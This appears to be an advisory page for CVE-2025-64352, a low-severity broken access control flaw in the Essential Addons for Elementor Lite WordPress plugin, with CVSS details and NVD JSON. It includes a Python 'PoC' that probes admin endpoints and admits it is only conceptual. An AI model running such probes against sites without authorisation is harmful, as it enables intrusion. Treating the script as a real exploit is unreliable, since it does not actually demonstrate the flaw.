Security Vulnerability Report
中文
CVE-2025-64352 CVSS 2.7 LOW

CVE-2025-64352

Published: 2025-10-31 12:15:36
Last Modified: 2026-04-27 16:16:41

Description

Missing Authorization vulnerability in WPDeveloper Essential Addons for Elementor essential-addons-for-elementor-lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Essential Addons for Elementor: from n/a through <= 6.2.4.

CVSS Details

CVSS Score
2.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:wpdeveloper:essential_addons_for_elementor:*:*:*:*:lite:wordpress:*:* - VULNERABLE
Essential Addons for Elementor Lite <= 6.2.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-64352 PoC - Essential Addons for Elementor Lite Broken Access Control # Target: WordPress site with Essential Addons for Elementor Lite <= 6.2.4 def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-64352 This PoC attempts to access restricted admin functionality """ # Target endpoint that requires admin privileges endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/wp/v2/settings', ] # Note: This is a conceptual PoC # Actual exploitation requires identifying specific vulnerable endpoints # Check Patchstack database for detailed endpoint information headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Content-Type': 'application/x-www-form-urlencoded', } print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-64352 - Essential Addons for Elementor Lite Broken Access Control") # Authentication required (high privilege user) # Replace with valid WordPress session cookies cookies = { 'wordpress_test_cookie': 'WP+Cookie+check', # Add authentication cookies here } for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: response = requests.get(url, headers=headers, cookies=cookies, timeout=10) # Check for successful access (should require higher privileges) if response.status_code == 200: print(f"[!] Potential vulnerability detected at {endpoint}") print(f"[+] Status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") print("[*] PoC execution completed") print("[*] Recommendation: Upgrade to Essential Addons for Elementor > 6.2.4") if __name__ == '__main__': if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64352", "sourceIdentifier": "[email protected]", "published": "2025-10-31T12:15:35.527", "lastModified": "2026-04-27T16:16:40.690", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in WPDeveloper Essential Addons for Elementor essential-addons-for-elementor-lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Essential Addons for Elementor: from n/a through <= 6.2.4."}, {"lang": "es", "value": "Vulnerabilidad por falta de autorización en WPDeveloper Essential Addons para Elementor essential-addons-for-elementor-lite permite explotar niveles de seguridad de control de acceso configurados de forma incorrecta. Este problema afecta a Essential Addons para Elementor: desde n/a hasta menor igual que 6.2.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wpdeveloper:essential_addons_for_elementor:*:*:*:*:lite:wordpress:*:*", "versionEndExcluding": "6.3.0", "matchCriteriaId": "4617F1B7-B6CF-4F36-9729-3D5E63CF630B"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/essential-addons-for-elementor-lite/vulnerability/wordpress-essential-addons-for-elementor-plugin-6-2-4-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}